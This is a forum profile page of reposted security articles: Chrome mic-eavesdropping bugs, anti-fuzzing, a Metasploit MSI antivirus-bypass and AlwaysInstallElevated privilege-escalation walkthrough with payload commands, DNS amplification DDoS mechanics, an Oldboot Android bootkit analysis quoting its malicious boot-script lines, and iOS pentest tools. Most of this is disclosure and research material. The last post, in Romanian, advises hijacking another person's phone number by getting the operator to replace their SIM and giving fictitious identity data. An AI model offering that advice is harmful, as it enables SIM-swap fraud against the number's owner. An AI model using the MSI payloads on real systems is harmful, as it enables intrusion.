Jump to content

Nytro

Administrators
  • Posts

    18787
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. Chrome Bugs Allow Sites to Listen to Your Private Conversations By exploiting bugs in Google Chrome, malicious sites can activate your microphone, and listen in on anything said around your computer, even after you’ve left those sites. Even while not using your computer - conversations, meetings and phone calls next to your computer may be recorded and compromised. While we’ve all grown accustomed to chatting with Siri, talking to our cars, and soon maybe even asking our glasses for directions, talking to our computers still feels weird. But now, Google is putting their full weight behind changing this. There’s no clearer evidence to this, than visiting Google.com, and seeing a speech recognition button right there inside Google’s most sacred real estate - the search box. Yet all this effort may now be compromised by a new exploit which lets malicious sites turn Google Chrome into a listening device, one that can record anything said in your office or your home, as long as Chrome is still running. Check out the video, to see the exploit in action Google’s Response I discovered this exploit while working on annyang, a popular JavaScript Speech Recognition library. My work has allowed me the insight to find multiple bugs in Chrome, and to come up with this exploit which combines all of them together. Wanting speech recognition to succeed, I of course decided to do the right thing… I reported this exploit to Google’s security team in private on September 13. By September 19, their engineers have identified the bugs and suggested fixes. On September 24, a patch which fixes the exploit was ready, and three days later my find was nominated for Chromium’s Reward Panel (where prizes can go as high as $30,000.) Google’s engineers, who’ve proven themselves to be just as talented as I imagined, were able to identify the problem and fix it in less than 2 weeks from my initial report. I was ecstatic. The system works. But then time passed, and the fix didn’t make it to users’ desktops. A month and a half later, I asked the team why the fix wasn’t released. Their answer was that there was an ongoing discussion within the Standards group, to agree on the correct behaviour - “Nothing is decided yet.” As of today, almost four months after learning about this issue, Google is still waiting for the Standards group to agree on the best course of action, and your browser is still vulnerable. By the way, the web’s standards organization, the W3C, has already defined the correct behaviour which would’ve prevented this… This was done in their specification for the Web Speech API, back in October 2012. How Does it Work? A user visits a site, that uses speech recognition to offer some cool new functionality. The site asks the user for permission to use his mic, the user accepts, and can now control the site with his voice. Chrome shows a clear indication in the browser that speech recognition is on, and once the user turns it off, or leaves that site, Chrome stops listening. So far, so good. But what if that site is run by someone with malicious intentions? Most sites using Speech Recognition, choose to use secure HTTPS connections. This doesn’t mean the site is safe, just that the owner bought a $5 security certificate. When you grant an HTTPS site permission to use your mic, Chrome will remember your choice, and allow the site to start listening in the future, without asking for permission again. This is perfectly fine, as long as Chrome gives you clear indication that you are being listened to, and that the site can’t start listening to you in background windows that are hidden to you. When you click the button to start or stop the speech recognition on the site, what you won’t notice is that the site may have also opened another hidden popunder window. This window can wait until the main site is closed, and then start listening in without asking for permission. This can be done in a window that you never saw, never interacted with, and probably didn’t even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that Speech Recognition is turned on in such windows - only in regular Chrome tabs. You can see the full source code for this exploit on GitHub. Speech Recognition's Future Speech recognition has huge potential for launching the web forward. Developers are creating amazing things, making sites better, easier to use, friendlier for people with disabilities, and just plain cool… As the maintainer of a popular speech recognition library, it may seem that I shot myself in the foot by exposing this. But I have no doubt that by exposing this, we can ensure that these issues will be resolved soon, and we can all go back to feeling very silly talking to our computers… A year from now, it will feel as natural as any of the other wonders of this age. Sursa: Chrome Bugs Lets Sites Listen to Your Private Conversations
  2. Introduction to Anti-Fuzzing: A Defence in Depth Aid Thursday January 2, 2014 tl;dr Anti-Fuzzing is a set of concepts and techniques that are designed to slowdown and frustrate threat actors looking to fuzz test software products by deliberately misbehaving, misdirecting, misinforming and otherwise hindering their efforts. The goal is to drive down the return of investment seen in fuzzing today by virtue of making it more expensive in terms of time and effort when used by malicious aggressors. History of Anti-Fuzzing Some of the original concepts that sit behind this post were conceived and developed by Aaron Adams and myself whilst at Research In Motion (BlackBerry) circa 2010. The history of Anti-Fuzzing is one of those fortunate accidents that sometimes occur. Whilst at BlackBerry we were looking to do some fuzzing of the legacy USB stack. For whatever reason the developers had added code that when the device encountered an unexpected value at a particular location in the USB protocol the device would deliberately catastrophically fail (catfail in RIM vernacular). This catfail would look to the uninitiated like the device had crashed and thus you would likely be inclined to investigate further to understand why. Ultimately you’d realise it was deliberate and then come to the conclusion that you had wasted time debugging the issue. After realising that wasting cycles in this manner could potentially be an effective and demoralising defensive technique to frustrate and hinder aggressors the concept of Anti-Fuzzing was born. Over the following years I fielded questions from at least three researchers who believed they may have found a security issue in the product’s USB stack when in fact they had simply tripped over the same intended behaviour. There is prior art in this space. Two industry luminaries in the guise of Haroon Meer and Roelof Temmingh in their seminal 2004 paper When the Tables Turn. In January 2013 a blog post titled Advanced Persistent Trolling by Francesco Manzoni discussed an Anti-Fuzzing concept specifically designed to frustrate penetration testers during web application assessments. This is obviously not something I condone but it introduced some similar techniques and concepts in the context of web applications specifically. Anti-Tamper: an Introduction Before we get onto Anti-Fuzzing first it’s worth understanding what Anti-Tamper is as it heavily influenced the early formation of the idea. In short Anti-Tamper is a US Department of Defence concept that is summarised (overview presentation) as follows: Anti-Tamper (AT) encompasses the systems engineering activities intended to prevent and/or delay exploitation of critical technologies in U.S. weapon systems. These activities involve the entire life-cycle of systems acquisition, including research, design, development, implementation, and testing of AT measures. Properly employed, AT will add longevity to a critical technology by deterring efforts to reverse-engineer, exploit, or develop countermeasures against a system or system component. AT is not intended to completely defeat such hostile attempts, but it should discourage exploitation or reverse-engineering or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version. These goals can equally apply to fuzzing. Anti-Fuzzing: a Summary If we take the Anti-Tamper mission statement and adjust the language for Anti-Fuzzing we arrive at something akin to: Anti-Fuzzing (AF) encompasses the systems engineering activities intended to prevent and/or delay fuzzing of software. Properly employed, AF will add longevity to the security of a technology by deterring efforts to fuzz and thus find vulnerabilities via this method against a system or system component. AF is not intended to completely defeat such hostile attempts, but it should discourage fuzzing or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version with improved mitigations. Now these are lofty goals for sure, but as you’ll see we can go some way as to meet them using a variety of different approaches. As with Anti-Tamper, Anti-Fuzzing is intended to: Deter: threat actor’s willingness or ability to fuzz effectively (i.e. have the aggressor pick an easier target). Detect: fuzzing and respond accordingly in a defensive manner. Prevent or degrade: the threat actor’s ability to succeed in their fuzzing mission. Articol complet: https://www.nccgroup.com/en/blog/2014/01/introduction-to-anti-fuzzing-a-defence-in-depth-aid/
  3. Bypassing Anti-Virus with Metasploit MSI Files 1/20/2014 | NetsPWN A while back I put together a short blog titled 10 Evil User Tricks for Bypassing Anti-Virus. The goal was to highlight common anti-virus misconfigurations. While I was chatting with Mark Beard he mentioned that I neglected to include how to use Metasploit payloads packaged in MSI files. So in this blog I'll try to make amends by providing a quick and dirty walkthrough of how to do that. This should be useful for both sysadmins and penetration testers. Creating MSI Files that Run Metasploit Payloads The Metasploit Framework team (and the greater security community) has made it easy and fun to package Metasploit payloads in almost any file format. Thankfully that includes MSI files. MSI files are Windows installation packages commonly used to deploy software via GPO and other methods. Luckily for penetration testers some anti-virus solutions aren't configured by default to scan .msi files or the .tmp files that are generated when MSI files are executed. For those of you who are interested in testing if your anti-virus solution stops Metasploit payloads packaged in .MSI files I worked with Mark to put together this short procedure. Use the msfconsole to create a MSI file that will execute a Metasploit payload. Feel free to choose your favorite payload, but I chose adduser because it makes for an easy test. Note: This payload requires local admin privileges to add the user. msfconsole use payload/windows/adduser set PASS Attacker123! set USER Attacker generate -t msi -f /tmp/evil.msi Alternatively, you can generate the MSI file with the msfvenom ruby script that comes with Metasploit: msfvenom -p windows/adduser USER=Attacker PASS=Attacker123! -f msi > evil.msi Copy the evil.msi file to the target system and run the MSI installation from the command line to execute the Metasploit payload. From a penetration test perspective using the /quiet switch is handy, because it suppresses messages that would normally be displayed to the user. msiexec /quiet /qn /I c:\temp\evil.msi Check anti-virus logs to see if the payload was identified. You can also check to see if the payload executed and added the "Attacker" user with the command below. If user information is returned then the payload executed successfully. net user attacker The MSI file is configured to execute the payload, but will not complete the formal installation process, because the authors (Ben Campbell and Parvez Anwar) forced it to fail using some invalid VBS. So uninstalling it won't be required after execution. However, during execution a randomly named .tmp file will be created that contains the MSF payload in the c:\windows\Installer\ folder. The file should be cleaned up automatically, but if the installation fails out for any reason the file will most likely need to be removed manually. The file will look something like "c:\windows\Installer\MSI5D2F.tmp". As a side note, it appears that the .tmp file is basically a renamed .exe file. So if you manually rename the .tmp file to an .exe file you can execute it directly. Also, once it's renamed to an .exe file anti-virus starts to pick it up. Escalating Privileges with MSI Packages As it turns out MSI files are handy for more than simply avoiding anti-virus. Parvez Anwar figured out that they can also be used to escalate privileges from local user to local administrator if the group policy setting "Always install with elevated privileges" is enabled for the computer and user configurations. The setting is exactly what it sounds like. It provides users with the ability to install any horrible ad-ware, pron-ware, or malware they want onto corporate systems. In gpedit.msc the configuration looks something like this: The policies can also be viewed or modified from the following registry locations: [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001 For those of you who don't want to go through hassle of generating and executing the MSI files manually Ben Campell (meatballs) and Parvez Anwar were nice enough to put together a Metasploit module to do it for you called "Windows AlwaysInstallElevated MSI". The technique was also mentioned during a recent presentation by Rob Fuller (mubix) and Chris Gates (carnal0wnage) titled "AT is the new BLACK" which is worth checking out. Wrap Up The down side is that MSI files can pose a serious threat if anti-virus and group policy settings are not configured securely. However, the bright side is it's an easy problem to fix in most environments. Good hunting, and don't forget to Hack Responsibly! References Windows Installer Package http://msdn.microsoft.com/en-us/library/aa244642(v=vs.60).aspx Advanced Installer - Download rewt dance: Metasploit MSI Payload Generation Abusing MSI’s elevated privileges | GreyHatHacker.NET Sursa: https://www.netspi.com/blog/entryid/212/bypassing-anti-virus-with-metasploit-msi-files
  4. Nytro

    gidb

    gidb gidb is a tool to simplify some common tasks for iOS pentesting and research. It is still a work in progress but already provides a bunch of (hopefully) useful commands. The goal was to provide all (or most) functionality for both, iDevices and the iOS simulator. For this, a lot is abstracted internally to make it work transparently for both environments. Although recently the focus has been more on suporting devices. idb was released as part of a talk at ShmooCon 2014. The slides of the talk are up on Speakerdeck. There is also a blog post on my personal website that I will update with the video of the talk once it is available. Getting Started Visit the getting started guide on the wiki. Bug reports, feature requests, and contributions are more than welcome! Command-Line Version idb started out as a command line tool which is still accesible through the cli branch. Find the getting started guid and some more documentation in the wiki. gidb Features Simplified pentesting setup Setup port forwarding Certificate management [*]iOS log viewer [*]Screen shot utility Simplifies testing for the creation of backgrounding screenshots [*]App-related functions App binary Download List imported libraries Check for encrypttion, ASLR, stack canaries Decrypt and download an app binary (requires dumpdecrypted) [*]Launch an app [*]View app details such as name, bundleid, and Info.plist file. [*]Inter-Process Communication URL Handlers List URL handlers Invoke and fuzz URL handlers [*]Pasteboard monitor [*]Analyze local file storage Search for, download, and view plist files Search for, download, and view sqlite databases Search for, download, and view local caches (Cache.db) File system browser [*]Install utilities on iDevices Ii Install iOS SSL killswitch alpha: Compile and install dumpdecrypted [*]Alpha: Cycript console Snoop-It integration Sursa: https://github.com/dmayer/idb
  5. Anatomy of a DNS DDoS Amplification Attack by David Piscitello, ICANN SSAC Fellow Over the past several months, a series of Distributed Denial of Service (DDoS) attacks victimized DNS root and Top Level Domain (TLD) name server operators. These attacks merit careful analysis because they combine several attack tools and methods to increase their effectiveness. The attacks also call attention to an operational problem that was solved long ago; yet most IT administrators have not adopted the answer. The attacker's toolkit The attacks observed against root and TLD name servers are variants of a DNS amplification attack and use the following tools: System compromise. An attacker doesn't want to use his own system to attack other systems and risk discovery, so he launches the attack from systems on which he has gained unauthorized administrative control. There are many ways to gain control of systems. One method uses a mass email worm to infect a large number of systems. When the worm infects a system, it installs a remote software agent, or zombie,that the attacker can remotely control and direct to initiate a DoS attack. Distributing the DoS attack sources. In the attacks observed, the attacker's goal is to saturate the targeted name server operator's communications infrastructure rather than the name servers themselves. Name server operators typically have large access circuits, so launching an attack from a single source is unlikely to accomplish this goal. But by amassing a veritable army of attack sources the attacker can fill even Gigabit per second access circuits. Botnets, a collection of zombie hosts the attacker "owns," commonly serve as the attacker's army. Amplification. Attackers use amplification to increase the traffic volume in an attack. In the DNS attacks, the attacker uses an extension to the DNS protocol (EDNS0) that enables large DNS messages. The attacker composes a DNS request message of approximately 60 bytes to trigger delivery of a response message of approximately 4000 bytes to the target. The resulting amplification factor, approximately 70:1, significantly increases the volume of traffic the target receives, accelerating the rate at which the target's resources will be depleted. DNS data corruption. To achieve the amplification effect, the attacker issues a DNS request that he knows will evoke a very large response. There are many ways for the attacker to know which DNS resource record to request in advance. For this article, we'll choose one and assume that the attacker has previously compromised a poorly configured name server and has modified this server's zone file to include a DNS TXT resource record of approximately 4000 bytes to serve as the amplification resource record. Impersonation. In the DNS attacks, each attacking host uses the targeted name server's IP address as its source IP address rather than its own. The effect of spoofing IP addresses in this manner is that responses to DNS requests will be returned to the target rather than the spoofing hosts. Exploitable name service operation. The DNS attacks exploit name servers that allow open recursion. Recursion is a method of processing a DNS request in which a name server performs the request for a client by asking the authoritative name server for the name record. Recursion is not inherently bad; however, recursion should only be provided for a trusted set of clients. Name servers that perform (open) recursion for any host provide attackers with an easily exploitable vector. The Attack Now that you are familiar with the attack elements, let's look at how the attack is performed. The attacker recruits his army of attack sources (the botnet). He writes the large amplification record (e.g., a 4000 byte DNS TXT resource record) in the zone file of the name server he has compromised. He tests for and compiles a list of open recursive name servers that will query the compromised name server on behalf of the spoofing hosts. (More than one million insecurely configured name servers worldwide provide open recursion, so this is quite an easy list to compile.) With these elements in place, the attacker commands his army to attack a targeted name server via the open recursive servers. Suppose the attacker targets a name server at the IP address 10.10.1.1. At the attacker's signal, all the zombies in his botnet issue DNS request messages asking for the amplification record through open recursive servers (see diagram). The botnet hosts spoof the targeted name server by writing 10.10.1.1 in the source IP address field of the IP packets containing their DNS request messages. The open recursive name servers accept the DNS request messages from the botnet hosts. If the open recursive name servers have not received a request for this record before, and do not already hold the amplification record in their cache, they issue a DNS request message of their own to the compromised name server to retrieve it, and the compromised name server returns the amplification record to the open recursive servers. The open recursive servers compose DNS response messages containing the amplification record and return these to the systems that originated the request. The open recursive servers believe they are sending DNS response messages to the botnet hosts that made the initial query, when in fact IP spoofing causes the responses to be forwarded to the target name server at 10.10.1.1. The targeted name server at 10.10.1.1 never issued any DNS request messages but is now bombarded with responses. The responses contain a 4000 byte DNS TXT record. A message of this size exceeds the maximum (Ethernet) transmission unit, so it is broken into multiple IP packet fragments. This forces reassembly at the destination, which increases the processing load at the target and enhances the deception: because the response spans several IP fragments, and only the first fragment contains the UDP header, the target may not immediately recognize that the attack is DNS-based. This DDoS attack is most effective when launched via a large number of open recursive servers. Distribution increases the traffic and decreases the focus on the sources of the attack . The impact on the misused open recursive servers is generally low, so generally goes undetected. The effect on the target, however, can be severe. Attacks based on this method have achieved a bandwidth consumption rate exceeding seven (7) Gigabits per second. Surviving (if you are the target) There are several measures you can take to diminish the effects of this DDoS attack. The source IP addresses are not spoofed in the IP packets carrying the DNS response messages, so the source addresses identify the open recursive servers the zombies use. Depending on the severity of the attack and how strongly you wish to respond, you can rate-limit traffic from these source IP addresses or use a filtering rule that drops DNS response messages that are suspiciously large (over 512 bytes). In the extreme, you may choose to block traffic from the open recursive servers entirely. These efforts do not squelch the attack sources, and they do not reduce the load on networks and switches between your name server and the open recursive servers. Note that if you block all traffic from these open recursive servers you may interfere with legitimate attempts to resolve names through these servers; for example, some organizations run open recursive servers so that mobile employees can resolve from a "trusted" name server, so such users can be affected. What can you do to reduce the threat? We know the tools attackers use, so we need to prevent him from assembling his toolkit. Two countermeasures are obvious. Securely configure client systems and use antivirus protection so that the attacker is unable to recruit his botnet army. Securely configure name servers to reduce the attacker's ability to corrupt a zone file with the amplification record. Disable open recursion on your name servers and only accept recursive DNS from trusted sources. This measure will greatly reduce the attack vectors. It is a relatively simple configuration change on common DNS application services such as Windows 2003 Server and BIND. If you are using an external DNS name server, test to see if it is offering open recursion. Contact your ISP or DNS provider and suggest he close this security loophole if open. Even when used in combination, these measures cannot have the same mitigating effect as source IP address validation. By performing source IP address validation, you can effectively prevent the impersonation attack: the botnet hosts can't generate DNS request messages posing as the targeted name server, which stems the attack at the outset. If you run an Internet firewall or a router that supports access control lists, modify your egress traffic filtering policy to only allow IP packets to exit your network if they contain source IP addresses assigned from the subnets you use internally. Source IP address validation is not widely implemented, despite repeated encouragement to do so by security experts and advisory groups such as SANS, CERT, and ICANN's Security and Stability Advisory Committee (SSAC). Critics of source IP address validation claim that implementation adds administrative overhead and adversely impacts performance. Sustained DDoS attacks against root and TLD name servers have potentially graver consequences, and the frequency and effectiveness of DDoS attacks is only increasing while we continue to ignore this much-needed security measure. Telecommunications networks have been validating telephone numbers and addresses on ingress traffic for decades. It's time for IP networks do the same. ## Sursa: Anatomy of a DNS DDoS Amplification Attack | WatchGuard
  6. [h=1]Oldboot: the first bootkit on Android[/h]Zihang Xiao Qihoo 360 Technology Co. Ltd. (NYSE: QIHU) Zihang Xiao, Qing Dong, Hao Zhang and Xuxian Jiang Jan 17, 2014 —— A few days ago, we found an Android Trojan using brand new method to modify devices’ boot partition and booting script file to launch system service and extract malicious application during the early stage of system’s booting. Due to the special RAM disk feature of Android devices’ boot partition, all current mobile antivirus product in the world can’t completely remove this Trojan or effectively repair the system. We named this Android Trojan family as Oldboot. As far as we know, this’s the first bootkit found on Android platform in the wild. According to our statistics, as of today, there’re more than 500, 000 Android devices infected by this bootkit in China in last six months. We’ve released a new security tool (download) which can accurately detect and defines it. [h=2]Construction and behaviors of Oldboot[/h] While an Android device be infected by Oldboot, its user will find some new applications which contain lots of advertisement frequently being installed to the system. In the installed applications list, the user will find a system application named GoogleKernel which can’t be uninstalled manually. Antivirus products, such as 360 Mobile Security, will classify this application as malware (Figure 1). However, after removing it and rebooting the device, the two previous phenomenon will occur again. Oldboot is constituted by four executable or configuration files: /init.rc, the configuration script for Android system’s booting which has been modified by Oldboot /sbin/imei_chk, an ELF executable file for ARM architecture /system/app/GoogleKernel.apk, an Android application which is installed as system application /system/lib/libgooglekernel.so, the native library used by the GoogleKernel Figure 1 Antivirus product classify the GoogleKernel as a malware These four files have complex calling relationship (Figure 2): When Android system is booting, it will read the init.rc, launch the imei_chk as system service and open related local socket; The imei_chk will then extract the libgooglekernel.so into /system/lib; The imei_chk will also extract the GoogleKernel.apk into /system/app; After system’s booting finished, the GoogleKernel.apk was installed as system application. It will periodically execute native code in the libgooglekernel.so to trigger malicious behaviors; The libgooglekernel.so will generate configurations or malicious commands, and pass them to Java code in the GoogleKernel.apk; The GoogleKernel.apk sends commands to the imei_chk through socket. These commands will be executed by the imei_chk at last. Figure 2 Components of Oldboot and their relationship Below is more detailed analysis to these files. At the tail of the init.rc’s content, we found these lines: service imei_chk /sbin/imei_chk class core socket imei_chk stream 666 According to this, when Android system’s booting, the init process will launch a new system service named imei_chk with root permission, and will create a local socket with the same name. Before creating socket and listening, the imei_chk will execute some code which read two data blocks from its read-only data segment and then extract them to these two files (Figure 3): /system/lib/libgooglekernel.so /system/app/GoogleKernel.apk Figure 3 The imei_chk extracts so and APK files On the other side, the imei_chk will create a socket to receive all coming data. These data will be parsed to Linux system commands which will be executed with root permission at last (Figure 4). Figure 4 The imei_chk receives commands and executes them In the infected device, we found the imei_chk socket is running with root permission and is listening to receive data from any other process. Please note that the access property of this socket device is 666 with the setuid flag (Figure 5). This world-writable property will lead to a serious security vulnerability: In the infected devices, any other applications can send this socket device some Linux commands which will be executed with root permission later. Figure 5 The imei_chk socket device can be written by any process When Android system is booting, it will check whether all APK files under /system/app are installed. If not, it will installed them as system applications (or so called pre-installed applications). Thus, the GoogleKernel.apk will be installed as system application, while the libgooglekernel.so, its reliant native library, has been extracted to correct place. When removing normal Android malware, all previous Android antivirus products will only uninstall and delete malicious APK and so files. Thus, when the device rebooting, the undeleted imei_chk will extract GoogleKernel.apk again. In fact, these antivirus product not only won’t, but also can’t effectively remove the imei_chk. We’ll discuss on this later. Let’s have a deeper look into the GoogleKernel.apk. It declares many system or dangerous level permissions in the AndroidManifest.xml, and specifies itself running by the system user: <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" /> <uses-permission android:name="android.permission.INSTALL_PACKAGES" /> <uses-permission android:name="android.permission.DELETE_PACKAGES" /> <uses-permission android:name="android.permission.CLEAR_APP_USER_DATA" /> <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> …… <application android:allowBackup="true" android:allowClearUserData="false" android:killAfterRestore="false" android:label="GoogleKernel" android:persistent="true" android:process="system"> The application has only one service named Dalvik and two receivers named BootRecv and EventsRecv, without any activity as well as user interface. Its main behaviors include collecting system information, changing network settings, and periodically triggering other malicious behaviors such as: Connecting to its C&C Server (Figure 6) to download configuration file; Connecting to its C&C Server to get back system commands, and executing with root permission; Downloading APK files (Figure 7) and installing as system applications (Figure 8) Uninstalling specified system applications. From some unfinished functions’ name, it seems that the author of Oldboot was planning to implement sending SMS to any specified phone number (Figure 9). Figure 6 The libgooglekernel.so stores C&C servers’ URL to its global config Figure 7 The libgooglekernel.so downloads APK files and install them Figure 8 The downloaded APK files are installed as system applications Figure 9 The libgooglekernel.so tries to send SMS, but related Java code isn’t finished The author of Oldboot intentionally designed malicious behaviors’ implementation. All main malicious behaviors are split to many different execute phases which are implemented in different components: The GoogleKernel.apk will periodically activate itself to call JNI interfaces of the so file to trigger malicious behaviors (Phase 1). If the behavior is to connect with C&C servers, the so file will construct servers’ URLs and call Java code in the APK file through JNI again (Phase 2). The APK file will start HTTP connection to servers and return request result to the so file (Phase 3). The so file then parses result’s format to get commands, configuration or data (Phase 4). If the behavior is to install APK files, or to uninstall system application, after downloading APK files through the above phases, the so file will construct system commands (including remount the system partition and pm install/uninstall) for installation or uninstallation and pass them to the APK file through JNI (Phase 5). The APK file will send these commands to the imei_chk service through local socket (Phase 6, see Figure 10 and Figure 11). At last, the imei_chk will execute these commands with root permission (Phase 7). Figure 10 The GoogleKernel.apk initializes connection with local socket imei_chk Figure 11 The GoogleKernel.apk send system commands to the socket [h=2]New infection methods[/h] Differ from previous malware on Android, the main specialty of Oldboot is its modification to the init.rc file and the /sbin directory. In Android, the root directory and the /sbin directory locate in the RAM disk which is loaded from the boot partition of device’s disk. This RAM disk is a read-only in-memory file system. And any runtime changing on it will never be physically written back to the disk. Thus, during system’s running, even we remount the partition to writeable, and delete some files in these directories, the deleting operations won’t really apply to the disk. After the device rebooting, these files will appear again. Previous Android malware, such as DroidKungfu, may extract malicious files to the /system partition. But the /system partition doesn’t have the above feature, which means, there’s no any technical difficult on both malware’s file writing and antivirus’ file deleting. However, when facing Oldboot, even the antivirus products know the imei_chk is a malicious which need to be deleted, they can’t really completely delete it by previous traditional method since this “remount” method will only delete the copy of /sbin/imei_chk in memory but won’t affect the disk partition. The problem is, how the attacker put the imei_chk into /sbin directory and successfully modified the init.rc script? We believe there’re at least two ways to achieve it: The attacker has a chance to physically touch the devices, and flash a malcious boot.img image files to the boot partition of the disk; During system’s running, after gaining root permission, forcibly write malicious files into boot partition through the dd utility. In Oldboot’s case, we’re more likely to believe that the attacker chose the first way (But we still can’t exclude possibility of the second one). Here’re reasons: Firstly, we found the infected device is bought from a big IT mall in Zhongguancun, which is a famous and the biggest consumer electronics distributing center in Beijing. In the past, we’ve found some retailers here flashing system images which contain malware into mobile phone or tablet them selling. Secondly, the infected device (the Galaxy Note II) contains Samsung’s stock system; all normal system applications in it has Samsung’s official signature. However, the recovery partition has been replaced by a third-party recovery ROM, and the timestamp of all files in the boot partition are the same (2013-05-08 17:22). Thirdly, based on Qihoo’s cloud security technology, we counted models of all known infected devices. More than half of them are not well-known popular models. If the attacker used the second way to infect devices remotely, the attack targets will be randomly and out of control which should be distributed more close to the real market distribution of Android devices. [h=2]Related samples[/h] The APK file extracted by Oldboot uses a self-signed certification. We found two other malware used the same certification. The first malware disguises as normal security application. It will dynamically register a ContentObserver to observe any changes of the SMS inbox. Every time a new SMS is coming, it will check if its content contains words such as “QQ number” or “password” in Chinese (Figure 12). If these words exist, it will delete this SMS, and upload the content to some specified severs. In the past, the Tencent provided service to recover QQ password through SMS. Thus, this malware can steal user’s QQ account at that time. The malware also uses receivers and service with the same name as in Oldboot’s APK file. Figure 12 The Oldboot’s related sample will steal QQ’s password The second related malware was named GoogleDalvik. Its code structures, including JNI interfaces and entry classes, are almostly the same as Oldboot,. The only difference between the GoogleDalvik and GoogleKernel.apk is, the previous doesn’t communicate with the imei_chk through socket. For installation or uninstallation system application, it just execute commands in its Java code (Figure 13). Figure 13 The Only difference between Oldboot and its previous version We believe, the GoogleDalvik is an earlier version of Oldboot, a version without bootkit component. The GoogleDalvik and Oldboot all use domains such as androld666.com and androld999.com as their C&C servers’ URL, this is the main reason we named this family as Oldboot. [h=2]Solutions[/h] Now, we’ve released the first special security tool for Oldboot. You can download it from: http://msoftdl.360.cn/mobilesafe/shouji360/360safesis/OldbootKiller_20140117.apk This tool will deeply and precisely scan Android devices to find the existence of Oldboot and its variants. We’ve developed a new defines method in it which can effectively disable all malicious behaviours of Oldboot. Besides of using our security tool to detect and defines it, we also suggest the users: Checking this tool’s updating regularly. We may add more ability to detect or clean its further variants. If it finds Oldboot on your phone, please report your phone’s information and the samples to us. This will help us a lot. You can also try to re-flash your device with its origin stock ROM. After flashing, the Oldboot should be completely removed. Since only modified devices will infect Oldboot, if you’ve find it by our tool, you can also directly contact with your reseller to take customer service. We also suggest you to install the 360 Mobile Security application and using its cloud detection ability to protect your mobile phone and tablet. [h=2]Discussion[/h] Before we found Oldboot, the most famous Android malware which is widely considered as rootkit is a variant of the DroidKungfu family. It gains root permission by system vulnerabilities, remounts system partition, replaces some executable files in it, and rewrites system configuration files. It also tries to run malicious code in the early stage of system’s booting to prevent be cleaned by antivirus applications. However, there’re many differences between DroidKungfu and Oldboot. Firstly, Oldboot’s infection method isn’t simply remounting system partition and changing files like DroidKungfu, but physically operating device’s disk (through flash or dd). Secondly, Oldboot can’t been removed or repaired in the file system level, but DroidKungfu can be. At last, this attack method, which exploits boot partition’s RAM disk feature, can be easily developed to implement more advanced file system level hidden. We believe Oldboot creates a totally new malware attack method on Android. Through physically touch or disk level operation, the further Android malware can similarly write themselves to the boot partition and modify the init.rc script to gain very earlier launch priority with high running permission to avoid being cleaned by antivirus solutions, as well as to effectively hide themselves. As the first found bootkit on Android, the Oldboot has symbolic significance. We will closely follow further development of this kind of attack. —— (media contacts: xiaozihang@360.cn) Sursa: Oldboot: the first bootkit on Android | 360????
  7. [h=1]iOS SSL Kill Switch[/h] Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS Apps. [h=2]Description[/h] Once installed on a jailbroken device, iOS SSL Kill Switch patches low-level SSL functions within the Secure Transport API, including SSLSetSessionOption() and SSLHandshake() in order to override and disable the system's default certificate validation as well as any kind of custom certificate validation (such as certificate pinning). It was successfully tested against the Twitter, Facebook, Square and Apple App Store apps; all of them implement certificate pinning. iOS SSL Kill Switch was initially released at Black Hat Vegas 2012. For more technical details on how it works, see iOS SSL Kill Switch v0.5 Released | In Security [h=2]Installation[/h] Users should first download the latest pre-compiled Debian package available in the release section of the project page at: https://github.com/iSECPartners/ios-ssl-kill-switch/releases The tool was tested on iOS7 running on an iPhone 5S. [h=3]Dependencies[/h] iOS SSL Kill Switch will only run on a jailbroken device. Using Cydia, make sure the following packages are installed: dpkg MobileSubstrate PreferenceLoader Sursa: https://github.com/iSECPartners/ios-ssl-kill-switch
  8. Boot-Repair-Disk, the 'must-have' rescue CD ! Here is THE Rescue Disk that you should keep close to your computer ! runs automatically Boot-Repair rescue tool at start-up also contains the OS-Uninstaller tool. repairs recent (UEFI) computers as well as old PCs HOW TO GET AND USE THE DISK: (1) DOWNLOAD BOOT-REPAIR-DISK, (2) Then burn it on CD or put it on USB key via Unetbootin, (3) Insert the Boot-Repair-Disk and reboot the PC, (4) Choose your language, (5) Connect internet if possible (6) Click "Recommended repair" (7) Reboot the pc --> solves the majority of bootsector/GRUB/MBR problems GET HELP: by Email (boot.repair ATT gmail DOT com) HELP THE PROJECT: Translate, or Donate (Paypal account boot.repair@gmail.com) Sursa: boot-repair-disk / Home / Home
  9. Da, exact la asta ma gandeam si eu cand mi se stricase cartela. Ca sa para mai "real" puteti lua o cartela de Orange, o zgariati incat sa nu mai mearga si ii puneti sa o schimbe. Dar cred ca varianta mai ok e cea cu pierdutul telefonului deoarece in acest caz "altcineva poate folosi cartela intre timp". PS: Nu va bazati pe asta. Cel putin la Orange, cand iti schimba cartela, TE OBLIGA jegosii sa iti faci un abonament pe 3 luni (sau mai mult) si ai nevoie de buletin pentru asta. Cu alte cuvinte, daca adevaratul posesor vine si se plange s-ar putea sa afle cine i-a facut asta. Incercati si voi sa scapati fara buletin, sa dati niste date fictive. Bine, cu datele astea "fictive" cred ca puteti ajunge la "fals in acte" si puteti avea probleme legale, ganditi-va daca se merita.
